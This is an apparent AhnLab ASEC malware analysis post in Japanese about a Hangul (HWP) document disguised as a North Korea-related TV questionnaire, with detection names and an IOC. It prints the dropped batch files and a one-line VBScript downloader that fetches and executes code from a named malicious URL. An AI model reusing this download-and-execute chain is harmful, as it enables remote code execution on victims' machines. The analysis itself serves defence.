最近、AhnLab ASEC 分析チームは 対北朝鮮に関する内容を含んでいる不正な WORD ファイルの拡散について共有した。そして今日、対北朝鮮に関する質問書内容のマルウェアがアレアハングルドキュメント(HWP)形式で配布されている状況を捕捉した。
捕捉した内容を確認すると、韓国国内の放送局が2020年12月15日、北朝鮮関連の討論アンケートで使用した文書が、マルウェアの製作者によって修正されたものと推定される。この不正なアレアハングル形式のファイルは、過去にも共有した手法の「リンクオブジェクト」が含まれているが、オブジェクトを挿入したパスの情報(C:\Users\Snow\AppData\Local\Temp)を通じて、Snow という名前のコンピュータ名を持つシステムにおいて当該ドキュメントが製作されたものと推定される。
- 文書タイトル:질의서-12월15일.hwp (翻訳:質問書-12月15日.hwp)
- 文書内容


上記 [図1] のように特定のテレビ放送における質問書の内容であるかのように偽装して配布されており、内部に不正なオブジェクトを挿入した形式を持っている。以前はオブジェクトが確認できるように製作していたのに対し、今回はドキュメントにパスワードを設定して編集制限をかけ、パスワードがわからない場合、当該オブジェクトのプロパティを確認できないようにしている。

しかし、以前との共通点と言えば、上に言及したように、内部にオブジェクトを挿入して相対パスのリンクを使用したものと予想される。その不正なドキュメントが 「C:\User\[ユーザー名]\AppData\」 パスに位置していない場合、以下のように内部の不正なオブジェクトが実行されない。パスワードがかかっていてオブジェクトのプロパティを確認できないが、これは相対パスに指定されているために、その位置を参照できないものと解釈できる。

条件と一致するパスで当該ドキュメントを開いたあと、内部の画面を覆っているオブジェクトをクリックすると、質問書に偽装した不正なアレアハングルドキュメントが、以下のパスに生成するファイル、TroubleShooter.bat を実行する。
- 生成ファイル
– %TEMP%\TroubleShooter.bat
start /min %temp%\Diagnostics.bat
– %TEMP%\Diagnostics.bat
start wscript //b //e:vbscript %temp%\HncConfig.ini
exit
– %TEMP%\HncConfig.ini
On Error Resume Next:Set x = CreateObject("MSXML2.ServerXMLHTTP.6.0"):x.open "GET", "http://yegip.kr/se2/photo_uploader/plugin/update/list.php?query=0", 0:x.Send:rt=x.responseText:Execute(rt)
実質的に不正な行為を実行するファイルは HncConfig.ini ファイルであり、追加で不正な URL に接続を試みるものの、現在は当該ネットワーク上からデータが受信されず、その後の不正な行為は確認されていない。
- 動作順序:TroubleShooter.bat > Diagnostics.bat 実行 > HncCongif.ini 実行 > 不正な URL に接続
- 不正な URL:hxxp://yegip.kr/se2/photo_uploader/plugin/update/list.php?query=0
最近、対北朝鮮に関する文書の内容を含んでいる様々なドキュメント形式のファイルが拡散しているため、北朝鮮関連の業務に従事しているユーザーはもちろん、上記のように質問書に偽装した文書に騙されて被害に遭わないよう、すべてのユーザーにおいて注意が必要である。
このファイルは、当社 V3 製品の2021.04.09.04エンジンに検知が反映されており、現在の他社アンチウイルスによる検知状況は以下の通りである。

[図5] – VirusTotal 検知状況
現在 V3 製品では、当該ファイルに対して以下の通りに検知している。
[ファイル検知]
- Dropper/HWP.Agent (2021.04.09.04)
- Trojan/BAT.Runner (2021.04.09.04)
- Downloader/VBS.Agent (2021.04.09.04)
[IOC]
- hxxp://yegip.kr/se2/photo_uploader/plugin/update/list.php?query=0
Categories:マルウェアの情報